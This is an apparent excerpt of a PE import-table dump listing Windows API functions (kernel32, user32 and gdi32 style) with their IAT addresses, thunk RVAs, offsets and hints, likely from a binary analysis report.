VirtualFreeEx | 0x0 | 0x4901b8 | 0xbd400 | 0xbc000 | 0x4ed |
OpenProcess | 0x0 | 0x4901bc | 0xbd404 | 0xbc004 | 0x380 |
VirtualAllocEx | 0x0 | 0x4901c0 | 0xbd408 | 0xbc008 | 0x4ea |
WriteProcessMemory | 0x0 | 0x4901c4 | 0xbd40c | 0xbc00c | 0x52e |
ReadProcessMemory | 0x0 | 0x4901c8 | 0xbd410 | 0xbc010 | 0x3c3 |
CreateFileW | 0x0 | 0x4901cc | 0xbd414 | 0xbc014 | 0x8f |
SetFilePointerEx | 0x0 | 0x4901d0 | 0xbd418 | 0xbc018 | 0x467 |
SetEndOfFile | 0x0 | 0x4901d4 | 0xbd41c | 0xbc01c | 0x453 |
ReadFile | 0x0 | 0x4901d8 | 0xbd420 | 0xbc020 | 0x3c0 |
WriteFile | 0x0 | 0x4901dc | 0xbd424 | 0xbc024 | 0x525 |
FlushFileBuffers | 0x0 | 0x4901e0 | 0xbd428 | 0xbc028 | 0x157 |
TerminateProcess | 0x0 | 0x4901e4 | 0xbd42c | 0xbc02c | 0x4c0 |
CreateToolhelp32Snapshot | 0x0 | 0x4901e8 | 0xbd430 | 0xbc030 | 0xbe |
Process32FirstW | 0x0 | 0x4901ec | 0xbd434 | 0xbc034 | 0x396 |
Process32NextW | 0x0 | 0x4901f0 | 0xbd438 | 0xbc038 | 0x398 |
SetFileTime | 0x0 | 0x4901f4 | 0xbd43c | 0xbc03c | 0x46a |
GetFileAttributesW | 0x0 | 0x4901f8 | 0xbd440 | 0xbc040 | 0x1ea |
FindFirstFileW | 0x0 | 0x4901fc | 0xbd444 | 0xbc044 | 0x139 |
FindClose | 0x0 | 0x490200 | 0xbd448 | 0xbc048 | 0x12e |
GetModuleFileNameW | 0x0 | 0x490204 | 0xbd44c | 0xbc04c | 0x214 |
SetCurrentDirectoryW | 0x0 | 0x490208 | 0xbd450 | 0xbc050 | 0x44d |
GetShortPathNameW | 0x0 | 0x49020c | 0xbd454 | 0xbc054 | 0x261 |
DeleteFileW | 0x0 | 0x490210 | 0xbd458 | 0xbc058 | 0xd6 |
FindNextFileW | 0x0 | 0x490214 | 0xbd45c | 0xbc05c | 0x145 |
CopyFileExW | 0x0 | 0x490218 | 0xbd460 | 0xbc060 | 0x72 |
MoveFileW | 0x0 | 0x49021c | 0xbd464 | 0xbc064 | 0x363 |
CreateDirectoryW | 0x0 | 0x490220 | 0xbd468 | 0xbc068 | 0x81 |
RemoveDirectoryW | 0x0 | 0x490224 | 0xbd46c | 0xbc06c | 0x403 |
SetSystemPowerState | 0x0 | 0x490228 | 0xbd470 | 0xbc070 | 0x48a |
QueryPerformanceFrequency | 0x0 | 0x49022c | 0xbd474 | 0xbc074 | 0x3a8 |
FindResourceW | 0x0 | 0x490230 | 0xbd478 | 0xbc078 | 0x14e |
LoadResource | 0x0 | 0x490234 | 0xbd47c | 0xbc07c | 0x341 |
LockResource | 0x0 | 0x490238 | 0xbd480 | 0xbc080 | 0x354 |
SizeofResource | 0x0 | 0x49023c | 0xbd484 | 0xbc084 | 0x4b1 |
EnumResourceNamesW | 0x0 | 0x490240 | 0xbd488 | 0xbc088 | 0x102 |
OutputDebugStringW | 0x0 | 0x490244 | 0xbd48c | 0xbc08c | 0x38a |
GetTempPathW | 0x0 | 0x490248 | 0xbd490 | 0xbc090 | 0x285 |
GetTempFileNameW | 0x0 | 0x49024c | 0xbd494 | 0xbc094 | 0x283 |
DeviceIoControl | 0x0 | 0x490250 | 0xbd498 | 0xbc098 | 0xdd |
GetLocalTime | 0x0 | 0x490254 | 0xbd49c | 0xbc09c | 0x203 |
CompareStringW | 0x0 | 0x490258 | 0xbd4a0 | 0xbc0a0 | 0x64 |
GetCurrentProcess | 0x0 | 0x49025c | 0xbd4a4 | 0xbc0a4 | 0x1c0 |
LeaveCriticalSection | 0x0 | 0x490260 | 0xbd4a8 | 0xbc0a8 | 0x339 |
GetStdHandle | 0x0 | 0x490264 | 0xbd4ac | 0xbc0ac | 0x264 |
CreatePipe | 0x0 | 0x490268 | 0xbd4b0 | 0xbc0b0 | 0xa1 |
InterlockedExchange | 0x0 | 0x49026c | 0xbd4b4 | 0xbc0b4 | 0x2ec |
TerminateThread | 0x0 | 0x490270 | 0xbd4b8 | 0xbc0b8 | 0x4c1 |
LoadLibraryExW | 0x0 | 0x490274 | 0xbd4bc | 0xbc0bc | 0x33e |
FindResourceExW | 0x0 | 0x490278 | 0xbd4c0 | 0xbc0c0 | 0x14d |
CopyFileW | 0x0 | 0x49027c | 0xbd4c4 | 0xbc0c4 | 0x75 |
VirtualFree | 0x0 | 0x490280 | 0xbd4c8 | 0xbc0c8 | 0x4ec |
FormatMessageW | 0x0 | 0x490284 | 0xbd4cc | 0xbc0cc | 0x15e |
GetExitCodeProcess | 0x0 | 0x490288 | 0xbd4d0 | 0xbc0d0 | 0x1df |
SetErrorMode | 0x0 | 0x49028c | 0xbd4d4 | 0xbc0d4 | 0x458 |
GetPrivateProfileStringW | 0x0 | 0x490290 | 0xbd4d8 | 0xbc0d8 | 0x242 |
WritePrivateProfileStringW | 0x0 | 0x490294 | 0xbd4dc | 0xbc0dc | 0x52b |
GetPrivateProfileSectionW | 0x0 | 0x490298 | 0xbd4e0 | 0xbc0e0 | 0x240 |
WritePrivateProfileSectionW | 0x0 | 0x49029c | 0xbd4e4 | 0xbc0e4 | 0x529 |
GetPrivateProfileSectionNamesW | 0x0 | 0x4902a0 | 0xbd4e8 | 0xbc0e8 | 0x23f |
FileTimeToLocalFileTime | 0x0 | 0x4902a4 | 0xbd4ec | 0xbc0ec | 0x124 |
FileTimeToSystemTime | 0x0 | 0x4902a8 | 0xbd4f0 | 0xbc0f0 | 0x125 |
SystemTimeToFileTime | 0x0 | 0x4902ac | 0xbd4f4 | 0xbc0f4 | 0x4bd |
LocalFileTimeToFileTime | 0x0 | 0x4902b0 | 0xbd4f8 | 0xbc0f8 | 0x346 |
GetDriveTypeW | 0x0 | 0x4902b4 | 0xbd4fc | 0xbc0fc | 0x1d3 |
GetDiskFreeSpaceExW | 0x0 | 0x4902b8 | 0xbd500 | 0xbc100 | 0x1ce |
GetDiskFreeSpaceW | 0x0 | 0x4902bc | 0xbd504 | 0xbc104 | 0x1cf |
GetVolumeInformationW | 0x0 | 0x4902c0 | 0xbd508 | 0xbc108 | 0x2a7 |
SetVolumeLabelW | 0x0 | 0x4902c4 | 0xbd50c | 0xbc10c | 0x4a9 |
CreateHardLinkW | 0x0 | 0x4902c8 | 0xbd510 | 0xbc110 | 0x93 |
SetFileAttributesW | 0x0 | 0x4902cc | 0xbd514 | 0xbc114 | 0x461 |
CreateEventW | 0x0 | 0x4902d0 | 0xbd518 | 0xbc118 | 0x85 |
SetEvent | 0x0 | 0x4902d4 | 0xbd51c | 0xbc11c | 0x459 |
GetEnvironmentVariableW | 0x0 | 0x4902d8 | 0xbd520 | 0xbc120 | 0x1dc |
SetEnvironmentVariableW | 0x0 | 0x4902dc | 0xbd524 | 0xbc124 | 0x457 |
GlobalLock | 0x0 | 0x4902e0 | 0xbd528 | 0xbc128 | 0x2be |
GlobalUnlock | 0x0 | 0x4902e4 | 0xbd52c | 0xbc12c | 0x2c5 |
GlobalAlloc | 0x0 | 0x4902e8 | 0xbd530 | 0xbc130 | 0x2b3 |
GetFileSize | 0x0 | 0x4902ec | 0xbd534 | 0xbc134 | 0x1f0 |
GlobalFree | 0x0 | 0x4902f0 | 0xbd538 | 0xbc138 | 0x2ba |
GlobalMemoryStatusEx | 0x0 | 0x4902f4 | 0xbd53c | 0xbc13c | 0x2c0 |
Beep | 0x0 | 0x4902f8 | 0xbd540 | 0xbc140 | 0x36 |
GetSystemDirectoryW | 0x0 | 0x4902fc | 0xbd544 | 0xbc144 | 0x270 |
HeapReAlloc | 0x0 | 0x490300 | 0xbd548 | 0xbc148 | 0x2d2 |
HeapSize | 0x0 | 0x490304 | 0xbd54c | 0xbc14c | 0x2d4 |
GetComputerNameW | 0x0 | 0x490308 | 0xbd550 | 0xbc150 | 0x18f |
GetWindowsDirectoryW | 0x0 | 0x49030c | 0xbd554 | 0xbc154 | 0x2af |
GetCurrentProcessId | 0x0 | 0x490310 | 0xbd558 | 0xbc158 | 0x1c1 |
GetProcessIoCounters | 0x0 | 0x490314 | 0xbd55c | 0xbc15c | 0x24e |
CreateProcessW | 0x0 | 0x490318 | 0xbd560 | 0xbc160 | 0xa8 |
GetProcessId | 0x0 | 0x49031c | 0xbd564 | 0xbc164 | 0x24c |
SetPriorityClass | 0x0 | 0x490320 | 0xbd568 | 0xbc168 | 0x47d |
LoadLibraryW | 0x0 | 0x490324 | 0xbd56c | 0xbc16c | 0x33f |
VirtualAlloc | 0x0 | 0x490328 | 0xbd570 | 0xbc170 | 0x4e9 |
IsDebuggerPresent | 0x0 | 0x49032c | 0xbd574 | 0xbc174 | 0x300 |
GetCurrentDirectoryW | 0x0 | 0x490330 | 0xbd578 | 0xbc178 | 0x1bf |
lstrcmpiW | 0x0 | 0x490334 | 0xbd57c | 0xbc17c | 0x545 |
DecodePointer | 0x0 | 0x490338 | 0xbd580 | 0xbc180 | 0xca |
GetLastError | 0x0 | 0x49033c | 0xbd584 | 0xbc184 | 0x202 |
RaiseException | 0x0 | 0x490340 | 0xbd588 | 0xbc188 | 0x3b1 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x490344 | 0xbd58c | 0xbc18c | 0x2e3 |
DeleteCriticalSection | 0x0 | 0x490348 | 0xbd590 | 0xbc190 | 0xd1 |
InterlockedDecrement | 0x0 | 0x49034c | 0xbd594 | 0xbc194 | 0x2eb |
InterlockedIncrement | 0x0 | 0x490350 | 0xbd598 | 0xbc198 | 0x2ef |
GetCurrentThread | 0x0 | 0x490354 | 0xbd59c | 0xbc19c | 0x1c4 |
CloseHandle | 0x0 | 0x490358 | 0xbd5a0 | 0xbc1a0 | 0x52 |
EnterCriticalSection | 0x0 | 0x49035c | 0xbd5a4 | 0xbc1a4 | 0xee |
GetFullPathNameW | 0x0 | 0x490360 | 0xbd5a8 | 0xbc1a8 | 0x1fb |
EncodePointer | 0x0 | 0x490364 | 0xbd5ac | 0xbc1ac | 0xea |
ExitProcess | 0x0 | 0x490368 | 0xbd5b0 | 0xbc1b0 | 0x119 |
GetModuleHandleExW | 0x0 | 0x49036c | 0xbd5b4 | 0xbc1b4 | 0x217 |
ExitThread | 0x0 | 0x490370 | 0xbd5b8 | 0xbc1b8 | 0x11a |
GetSystemTimeAsFileTime | 0x0 | 0x490374 | 0xbd5bc | 0xbc1bc | 0x279 |
ResumeThread | 0x0 | 0x490378 | 0xbd5c0 | 0xbc1c0 | 0x413 |
GetCommandLineW | 0x0 | 0x49037c | 0xbd5c4 | 0xbc1c4 | 0x187 |
IsProcessorFeaturePresent | 0x0 | 0x490380 | 0xbd5c8 | 0xbc1c8 | 0x304 |
IsValidCodePage | 0x0 | 0x490384 | 0xbd5cc | 0xbc1cc | 0x30a |
GetACP | 0x0 | 0x490388 | 0xbd5d0 | 0xbc1d0 | 0x168 |
GetOEMCP | 0x0 | 0x49038c | 0xbd5d4 | 0xbc1d4 | 0x237 |
GetCPInfo | 0x0 | 0x490390 | 0xbd5d8 | 0xbc1d8 | 0x172 |
SetLastError | 0x0 | 0x490394 | 0xbd5dc | 0xbc1dc | 0x473 |
UnhandledExceptionFilter | 0x0 | 0x490398 | 0xbd5e0 | 0xbc1e0 | 0x4d3 |
SetUnhandledExceptionFilter | 0x0 | 0x49039c | 0xbd5e4 | 0xbc1e4 | 0x4a5 |
TlsAlloc | 0x0 | 0x4903a0 | 0xbd5e8 | 0xbc1e8 | 0x4c5 |
TlsGetValue | 0x0 | 0x4903a4 | 0xbd5ec | 0xbc1ec | 0x4c7 |
TlsSetValue | 0x0 | 0x4903a8 | 0xbd5f0 | 0xbc1f0 | 0x4c8 |
TlsFree | 0x0 | 0x4903ac | 0xbd5f4 | 0xbc1f4 | 0x4c6 |
GetStartupInfoW | 0x0 | 0x4903b0 | 0xbd5f8 | 0xbc1f8 | 0x263 |
GetStringTypeW | 0x0 | 0x4903b4 | 0xbd5fc | 0xbc1fc | 0x269 |
SetStdHandle | 0x0 | 0x4903b8 | 0xbd600 | 0xbc200 | 0x487 |
GetFileType | 0x0 | 0x4903bc | 0xbd604 | 0xbc204 | 0x1f3 |
GetConsoleCP | 0x0 | 0x4903c0 | 0xbd608 | 0xbc208 | 0x19a |
GetConsoleMode | 0x0 | 0x4903c4 | 0xbd60c | 0xbc20c | 0x1ac |
RtlUnwind | 0x0 | 0x4903c8 | 0xbd610 | 0xbc210 | 0x418 |
ReadConsoleW | 0x0 | 0x4903cc | 0xbd614 | 0xbc214 | 0x3be |
GetTimeZoneInformation | 0x0 | 0x4903d0 | 0xbd618 | 0xbc218 | 0x298 |
GetDateFormatW | 0x0 | 0x4903d4 | 0xbd61c | 0xbc21c | 0x1c8 |
GetTimeFormatW | 0x0 | 0x4903d8 | 0xbd620 | 0xbc220 | 0x297 |
LCMapStringW | 0x0 | 0x4903dc | 0xbd624 | 0xbc224 | 0x32d |
GetEnvironmentStringsW | 0x0 | 0x4903e0 | 0xbd628 | 0xbc228 | 0x1da |
FreeEnvironmentStringsW | 0x0 | 0x4903e4 | 0xbd62c | 0xbc22c | 0x161 |
WriteConsoleW | 0x0 | 0x4903e8 | 0xbd630 | 0xbc230 | 0x524 |
GetLongPathNameW | 0x0 | 0x4903ec | 0xbd634 | 0xbc234 | 0x20f |
SetEnvironmentVariableA | 0x0 | 0x4903f0 | 0xbd638 | 0xbc238 | 0x456 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AdjustWindowRectEx | 0x0 | 0x4904cc | 0xbd714 | 0xbc314 | 0x3 |
CopyImage | 0x0 | 0x4904d0 | 0xbd718 | 0xbc318 | 0x54 |
SetWindowPos | 0x0 | 0x4904d4 | 0xbd71c | 0xbc31c | 0x2c6 |
GetCursorInfo | 0x0 | 0x4904d8 | 0xbd720 | 0xbc320 | 0x11f |
RegisterHotKey | 0x0 | 0x4904dc | 0xbd724 | 0xbc324 | 0x256 |
ClientToScreen | 0x0 | 0x4904e0 | 0xbd728 | 0xbc328 | 0x47 |
GetKeyboardLayoutNameW | 0x0 | 0x4904e4 | 0xbd72c | 0xbc32c | 0x141 |
IsCharAlphaW | 0x0 | 0x4904e8 | 0xbd730 | 0xbc330 | 0x1c4 |
IsCharAlphaNumericW | 0x0 | 0x4904ec | 0xbd734 | 0xbc334 | 0x1c3 |
IsCharLowerW | 0x0 | 0x4904f0 | 0xbd738 | 0xbc338 | 0x1c6 |
IsCharUpperW | 0x0 | 0x4904f4 | 0xbd73c | 0xbc33c | 0x1c8 |
GetMenuStringW | 0x0 | 0x4904f8 | 0xbd740 | 0xbc340 | 0x158 |
GetSubMenu | 0x0 | 0x4904fc | 0xbd744 | 0xbc344 | 0x17a |
GetCaretPos | 0x0 | 0x490500 | 0xbd748 | 0xbc348 | 0x10a |
IsZoomed | 0x0 | 0x490504 | 0xbd74c | 0xbc34c | 0x1e2 |
MonitorFromPoint | 0x0 | 0x490508 | 0xbd750 | 0xbc350 | 0x218 |
GetMonitorInfoW | 0x0 | 0x49050c | 0xbd754 | 0xbc354 | 0x15f |
SetWindowLongW | 0x0 | 0x490510 | 0xbd758 | 0xbc358 | 0x2c4 |
SetLayeredWindowAttributes | 0x0 | 0x490514 | 0xbd75c | 0xbc35c | 0x298 |
FlashWindow | 0x0 | 0x490518 | 0xbd760 | 0xbc360 | 0xfb |
GetClassLongW | 0x0 | 0x49051c | 0xbd764 | 0xbc364 | 0x110 |
TranslateAcceleratorW | 0x0 | 0x490520 | 0xbd768 | 0xbc368 | 0x2fa |
IsDialogMessageW | 0x0 | 0x490524 | 0xbd76c | 0xbc36c | 0x1cd |
GetSysColor | 0x0 | 0x490528 | 0xbd770 | 0xbc370 | 0x17b |
InflateRect | 0x0 | 0x49052c | 0xbd774 | 0xbc374 | 0x1b5 |
DrawFocusRect | 0x0 | 0x490530 | 0xbd778 | 0xbc378 | 0xc4 |
DrawTextW | 0x0 | 0x490534 | 0xbd77c | 0xbc37c | 0xd0 |
FrameRect | 0x0 | 0x490538 | 0xbd780 | 0xbc380 | 0xfd |
DrawFrameControl | 0x0 | 0x49053c | 0xbd784 | 0xbc384 | 0xc6 |
FillRect | 0x0 | 0x490540 | 0xbd788 | 0xbc388 | 0xf6 |
PtInRect | 0x0 | 0x490544 | 0xbd78c | 0xbc38c | 0x240 |
DestroyAcceleratorTable | 0x0 | 0x490548 | 0xbd790 | 0xbc390 | 0xa0 |
CreateAcceleratorTableW | 0x0 | 0x49054c | 0xbd794 | 0xbc394 | 0x58 |
SetCursor | 0x0 | 0x490550 | 0xbd798 | 0xbc398 | 0x288 |
GetWindowDC | 0x0 | 0x490554 | 0xbd79c | 0xbc39c | 0x192 |
GetSystemMetrics | 0x0 | 0x490558 | 0xbd7a0 | 0xbc3a0 | 0x17e |
GetActiveWindow | 0x0 | 0x49055c | 0xbd7a4 | 0xbc3a4 | 0x100 |
CharNextW | 0x0 | 0x490560 | 0xbd7a8 | 0xbc3a8 | 0x31 |
wsprintfW | 0x0 | 0x490564 | 0xbd7ac | 0xbc3ac | 0x333 |
RedrawWindow | 0x0 | 0x490568 | 0xbd7b0 | 0xbc3b0 | 0x24a |
DrawMenuBar | 0x0 | 0x49056c | 0xbd7b4 | 0xbc3b4 | 0xc9 |
DestroyMenu | 0x0 | 0x490570 | 0xbd7b8 | 0xbc3b8 | 0xa4 |
SetMenu | 0x0 | 0x490574 | 0xbd7bc | 0xbc3bc | 0x29c |
GetWindowTextLengthW | 0x0 | 0x490578 | 0xbd7c0 | 0xbc3c0 | 0x1a2 |
CreateMenu | 0x0 | 0x49057c | 0xbd7c4 | 0xbc3c4 | 0x6a |
IsDlgButtonChecked | 0x0 | 0x490580 | 0xbd7c8 | 0xbc3c8 | 0x1ce |
DefDlgProcW | 0x0 | 0x490584 | 0xbd7cc | 0xbc3cc | 0x95 |
CallWindowProcW | 0x0 | 0x490588 | 0xbd7d0 | 0xbc3d0 | 0x1e |
ReleaseCapture | 0x0 | 0x49058c | 0xbd7d4 | 0xbc3d4 | 0x264 |
SetCapture | 0x0 | 0x490590 | 0xbd7d8 | 0xbc3d8 | 0x280 |
CreateIconFromResourceEx | 0x0 | 0x490594 | 0xbd7dc | 0xbc3dc | 0x66 |
mouse_event | 0x0 | 0x490598 | 0xbd7e0 | 0xbc3e0 | 0x331 |
ExitWindowsEx | 0x0 | 0x49059c | 0xbd7e4 | 0xbc3e4 | 0xf5 |
SetActiveWindow | 0x0 | 0x4905a0 | 0xbd7e8 | 0xbc3e8 | 0x27f |
FindWindowExW | 0x0 | 0x4905a4 | 0xbd7ec | 0xbc3ec | 0xf9 |
EnumThreadWindows | 0x0 | 0x4905a8 | 0xbd7f0 | 0xbc3f0 | 0xef |
SetMenuDefaultItem | 0x0 | 0x4905ac | 0xbd7f4 | 0xbc3f4 | 0x29e |
InsertMenuItemW | 0x0 | 0x4905b0 | 0xbd7f8 | 0xbc3f8 | 0x1b9 |
IsMenu | 0x0 | 0x4905b4 | 0xbd7fc | 0xbc3fc | 0x1d2 |
TrackPopupMenuEx | 0x0 | 0x4905b8 | 0xbd800 | 0xbc400 | 0x2f7 |
GetCursorPos | 0x0 | 0x4905bc | 0xbd804 | 0xbc404 | 0x120 |
DeleteMenu | 0x0 | 0x4905c0 | 0xbd808 | 0xbc408 | 0x9e |
SetRect | 0x0 | 0x4905c4 | 0xbd80c | 0xbc40c | 0x2ae |
GetMenuItemID | 0x0 | 0x4905c8 | 0xbd810 | 0xbc410 | 0x152 |
GetMenuItemCount | 0x0 | 0x4905cc | 0xbd814 | 0xbc414 | 0x151 |
SetMenuItemInfoW | 0x0 | 0x4905d0 | 0xbd818 | 0xbc418 | 0x2a2 |
GetMenuItemInfoW | 0x0 | 0x4905d4 | 0xbd81c | 0xbc41c | 0x154 |
SetForegroundWindow | 0x0 | 0x4905d8 | 0xbd820 | 0xbc420 | 0x293 |
IsIconic | 0x0 | 0x4905dc | 0xbd824 | 0xbc424 | 0x1d1 |
FindWindowW | 0x0 | 0x4905e0 | 0xbd828 | 0xbc428 | 0xfa |
MonitorFromRect | 0x0 | 0x4905e4 | 0xbd82c | 0xbc42c | 0x219 |
keybd_event | 0x0 | 0x4905e8 | 0xbd830 | 0xbc430 | 0x330 |
SendInput | 0x0 | 0x4905ec | 0xbd834 | 0xbc434 | 0x276 |
GetAsyncKeyState | 0x0 | 0x4905f0 | 0xbd838 | 0xbc438 | 0x107 |
SetKeyboardState | 0x0 | 0x4905f4 | 0xbd83c | 0xbc43c | 0x296 |
GetKeyboardState | 0x0 | 0x4905f8 | 0xbd840 | 0xbc440 | 0x142 |
GetKeyState | 0x0 | 0x4905fc | 0xbd844 | 0xbc444 | 0x13d |
VkKeyScanW | 0x0 | 0x490600 | 0xbd848 | 0xbc448 | 0x321 |
LoadStringW | 0x0 | 0x490604 | 0xbd84c | 0xbc44c | 0x1fa |
DialogBoxParamW | 0x0 | 0x490608 | 0xbd850 | 0xbc450 | 0xac |
MessageBeep | 0x0 | 0x49060c | 0xbd854 | 0xbc454 | 0x20d |
EndDialog | 0x0 | 0x490610 | 0xbd858 | 0xbc458 | 0xda |
SendDlgItemMessageW | 0x0 | 0x490614 | 0xbd85c | 0xbc45c | 0x273 |
GetDlgItem | 0x0 | 0x490618 | 0xbd860 | 0xbc460 | 0x127 |
SetWindowTextW | 0x0 | 0x49061c | 0xbd864 | 0xbc464 | 0x2cb |
CopyRect | 0x0 | 0x490620 | 0xbd868 | 0xbc468 | 0x55 |
ReleaseDC | 0x0 | 0x490624 | 0xbd86c | 0xbc46c | 0x265 |
GetDC | 0x0 | 0x490628 | 0xbd870 | 0xbc470 | 0x121 |
EndPaint | 0x0 | 0x49062c | 0xbd874 | 0xbc474 | 0xdc |
BeginPaint | 0x0 | 0x490630 | 0xbd878 | 0xbc478 | 0xe |
GetClientRect | 0x0 | 0x490634 | 0xbd87c | 0xbc47c | 0x114 |
GetMenu | 0x0 | 0x490638 | 0xbd880 | 0xbc480 | 0x14b |
DestroyWindow | 0x0 | 0x49063c | 0xbd884 | 0xbc484 | 0xa6 |
EnumWindows | 0x0 | 0x490640 | 0xbd888 | 0xbc488 | 0xf2 |
GetDesktopWindow | 0x0 | 0x490644 | 0xbd88c | 0xbc48c | 0x123 |
IsWindow | 0x0 | 0x490648 | 0xbd890 | 0xbc490 | 0x1db |
IsWindowEnabled | 0x0 | 0x49064c | 0xbd894 | 0xbc494 | 0x1dc |
IsWindowVisible | 0x0 | 0x490650 | 0xbd898 | 0xbc498 | 0x1e0 |
EnableWindow | 0x0 | 0x490654 | 0xbd89c | 0xbc49c | 0xd8 |
InvalidateRect | 0x0 | 0x490658 | 0xbd8a0 | 0xbc4a0 | 0x1be |
GetWindowLongW | 0x0 | 0x49065c | 0xbd8a4 | 0xbc4a4 | 0x196 |
GetWindowThreadProcessId | 0x0 | 0x490660 | 0xbd8a8 | 0xbc4a8 | 0x1a4 |
AttachThreadInput | 0x0 | 0x490664 | 0xbd8ac | 0xbc4ac | 0xc |
GetFocus | 0x0 | 0x490668 | 0xbd8b0 | 0xbc4b0 | 0x12c |
GetWindowTextW | 0x0 | 0x49066c | 0xbd8b4 | 0xbc4b4 | 0x1a3 |
ScreenToClient | 0x0 | 0x490670 | 0xbd8b8 | 0xbc4b8 | 0x26d |
SendMessageTimeoutW | 0x0 | 0x490674 | 0xbd8bc | 0xbc4bc | 0x27b |
EnumChildWindows | 0x0 | 0x490678 | 0xbd8c0 | 0xbc4c0 | 0xdf |
CharUpperBuffW | 0x0 | 0x49067c | 0xbd8c4 | 0xbc4c4 | 0x3b |
GetParent | 0x0 | 0x490680 | 0xbd8c8 | 0xbc4c8 | 0x164 |
GetDlgCtrlID | 0x0 | 0x490684 | 0xbd8cc | 0xbc4cc | 0x126 |
SendMessageW | 0x0 | 0x490688 | 0xbd8d0 | 0xbc4d0 | 0x27c |
MapVirtualKeyW | 0x0 | 0x49068c | 0xbd8d4 | 0xbc4d4 | 0x208 |
PostMessageW | 0x0 | 0x490690 | 0xbd8d8 | 0xbc4d8 | 0x236 |
GetWindowRect | 0x0 | 0x490694 | 0xbd8dc | 0xbc4dc | 0x19c |
SetUserObjectSecurity | 0x0 | 0x490698 | 0xbd8e0 | 0xbc4e0 | 0x2be |
CloseDesktop | 0x0 | 0x49069c | 0xbd8e4 | 0xbc4e4 | 0x4a |
CloseWindowStation | 0x0 | 0x4906a0 | 0xbd8e8 | 0xbc4e8 | 0x4e |
OpenDesktopW | 0x0 | 0x4906a4 | 0xbd8ec | 0xbc4ec | 0x228 |
SetProcessWindowStation | 0x0 | 0x4906a8 | 0xbd8f0 | 0xbc4f0 | 0x2aa |
GetProcessWindowStation | 0x0 | 0x4906ac | 0xbd8f4 | 0xbc4f4 | 0x168 |
OpenWindowStationW | 0x0 | 0x4906b0 | 0xbd8f8 | 0xbc4f8 | 0x22d |
GetUserObjectSecurity | 0x0 | 0x4906b4 | 0xbd8fc | 0xbc4fc | 0x18c |
MessageBoxW | 0x0 | 0x4906b8 | 0xbd900 | 0xbc500 | 0x215 |
DefWindowProcW | 0x0 | 0x4906bc | 0xbd904 | 0xbc504 | 0x9c |
SetClipboardData | 0x0 | 0x4906c0 | 0xbd908 | 0xbc508 | 0x286 |
EmptyClipboard | 0x0 | 0x4906c4 | 0xbd90c | 0xbc50c | 0xd5 |
CountClipboardFormats | 0x0 | 0x4906c8 | 0xbd910 | 0xbc510 | 0x56 |
CloseClipboard | 0x0 | 0x4906cc | 0xbd914 | 0xbc514 | 0x49 |
GetClipboardData | 0x0 | 0x4906d0 | 0xbd918 | 0xbc518 | 0x116 |
IsClipboardFormatAvailable | 0x0 | 0x4906d4 | 0xbd91c | 0xbc51c | 0x1ca |
OpenClipboard | 0x0 | 0x4906d8 | 0xbd920 | 0xbc520 | 0x226 |
BlockInput | 0x0 | 0x4906dc | 0xbd924 | 0xbc524 | 0xf |
GetMessageW | 0x0 | 0x4906e0 | 0xbd928 | 0xbc528 | 0x15d |
LockWindowUpdate | 0x0 | 0x4906e4 | 0xbd92c | 0xbc52c | 0x1fd |
DispatchMessageW | 0x0 | 0x4906e8 | 0xbd930 | 0xbc530 | 0xaf |
TranslateMessage | 0x0 | 0x4906ec | 0xbd934 | 0xbc534 | 0x2fc |
PeekMessageW | 0x0 | 0x4906f0 | 0xbd938 | 0xbc538 | 0x233 |
UnregisterHotKey | 0x0 | 0x4906f4 | 0xbd93c | 0xbc53c | 0x308 |
CheckMenuRadioItem | 0x0 | 0x4906f8 | 0xbd940 | 0xbc540 | 0x40 |
CharLowerBuffW | 0x0 | 0x4906fc | 0xbd944 | 0xbc544 | 0x2d |
MoveWindow | 0x0 | 0x490700 | 0xbd948 | 0xbc548 | 0x21b |
SetFocus | 0x0 | 0x490704 | 0xbd94c | 0xbc54c | 0x292 |
PostQuitMessage | 0x0 | 0x490708 | 0xbd950 | 0xbc550 | 0x237 |
KillTimer | 0x0 | 0x49070c | 0xbd954 | 0xbc554 | 0x1e3 |
CreatePopupMenu | 0x0 | 0x490710 | 0xbd958 | 0xbc558 | 0x6b |
RegisterWindowMessageW | 0x0 | 0x490714 | 0xbd95c | 0xbc55c | 0x263 |
SetTimer | 0x0 | 0x490718 | 0xbd960 | 0xbc560 | 0x2bb |
ShowWindow | 0x0 | 0x49071c | 0xbd964 | 0xbc564 | 0x2df |
CreateWindowExW | 0x0 | 0x490720 | 0xbd968 | 0xbc568 | 0x6e |
RegisterClassExW | 0x0 | 0x490724 | 0xbd96c | 0xbc56c | 0x24d |
LoadIconW | 0x0 | 0x490728 | 0xbd970 | 0xbc570 | 0x1ed |
LoadCursorW | 0x0 | 0x49072c | 0xbd974 | 0xbc574 | 0x1eb |
GetSysColorBrush | 0x0 | 0x490730 | 0xbd978 | 0xbc578 | 0x17c |
GetForegroundWindow | 0x0 | 0x490734 | 0xbd97c | 0xbc57c | 0x12d |
MessageBoxA | 0x0 | 0x490738 | 0xbd980 | 0xbc580 | 0x20e |
DestroyIcon | 0x0 | 0x49073c | 0xbd984 | 0xbc584 | 0xa3 |
SystemParametersInfoW | 0x0 | 0x490740 | 0xbd988 | 0xbc588 | 0x2ec |
LoadImageW | 0x0 | 0x490744 | 0xbd98c | 0xbc58c | 0x1ef |
GetClassNameW | 0x0 | 0x490748 | 0xbd990 | 0xbc590 | 0x112 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
StrokePath | 0x0 | 0x4900c4 | 0xbd30c | 0xbbf0c | 0x2b6 |
DeleteObject | 0x0 | 0x4900c8 | 0xbd310 | 0xbbf10 | 0xe6 |
GetTextExtentPoint32W | 0x0 | 0x4900cc | 0xbd314 | 0xbbf14 | 0x21e |
ExtCreatePen | 0x0 | 0x4900d0 | 0xbd318 | 0xbbf18 | 0x132 |
GetDeviceCaps | 0x0 | 0x4900d4 | 0xbd31c | 0xbbf1c | 0x1cb |
EndPath | 0x0 | 0x4900d8 | 0xbd320 | 0xbbf20 | 0xf3 |
SetPixel | 0x0 | 0x4900dc | 0xbd324 | 0xbbf24 | 0x29b |
CloseFigure | 0x0 | 0x4900e0 | 0xbd328 | 0xbbf28 | 0x1e |
CreateCompatibleBitmap | 0x0 | 0x4900e4 | 0xbd32c | 0xbbf2c | 0x2f |
CreateCompatibleDC | 0x0 | 0x4900e8 | 0xbd330 | 0xbbf30 | 0x30 |
SelectObject | 0x0 | 0x4900ec | 0xbd334 | 0xbbf34 | 0x277 |
